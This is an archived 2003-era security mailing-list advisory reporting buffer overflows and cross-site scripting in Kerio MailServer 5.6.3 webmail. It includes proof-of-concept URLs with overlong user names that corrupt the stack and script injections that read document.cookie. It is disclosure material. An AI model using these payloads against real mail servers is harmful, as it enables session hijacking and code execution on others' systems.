lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <56871.80.58.4.235.1055966091.squirrel@www.videosoft.net.uy>
From: conde0 at telefonica.net (David F.Madrid)
Subject: Multiple buffer overflows and XSS in Kerio MailServer

Issue :

Multiple buffer overflows and XSS in Kerio MailServer

Version affected

5.6.3 ( last in kerio website )

Vendor status :

Vendor was notified

Description :

Kerio develop a mail server with support for Imap , Pop3, Smtp and SSL
protocols . Besides , it includes a webmail . This webmail is vulnerable
to basic cross site scriting attacks and buffer overflows that can lead to
a session hijacking or executing code with system privileges .
do_subscribe module

A long user name causes a total stack corruption and an access violation .
Three bytes of a thread instruction pointer EIP are overwriten with our
user name supplied , thus making easy to execute code
http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA

add_acl module

Due to insufficient saninization of variables passed to module that appear
on the screen is possible to inject a script to be executed in the context
of the webmail
http://[server]/add_acl?folder=~conde0@...alhost/INBOX&add_name=<script>alert(document.cookie);</script>

If we set as folder ~admin@...alhost/INBOX and click it the mail server
will stop with an access violation .
Besides , add_acl module is affected as well by the problem of long user
names
http://[server]/add_acl?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@localhost/INBOX&add_name=lucas

The crash ocurrs in the same way , sign that is the same function what is
causing the error .
list module

http://[Server]/list?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@localhost/INBOX

The same buffer overflow .

do_map module

Due to insufficient saninization of variables passed to module that appear
on the screen is possible to inject a script to be executed in the context
of the webmail
http://[Server]/do_map?action=new&oldalias=eso&alias=<script>alert(document.cookie);</script>&folder=public&user=lucascavadora

Besides is vulnerable when using long user names

http://[Server]/do_map?action=new&oldalias=eso&alias=aaa&folder=public&user=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA

For these buffer overflows to be exploitable you need an account in the
webmail , but an intruder can build a link with code to execute and wait
for the click of a user with an open session in Kerio mailserver .
You can find a spanish version of this advisory at

http://nautopia.org/vulnerabilidades/kerio_mailserver.htm


-- 
Regards ,

David F. Madrid
Madrid , Spain

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ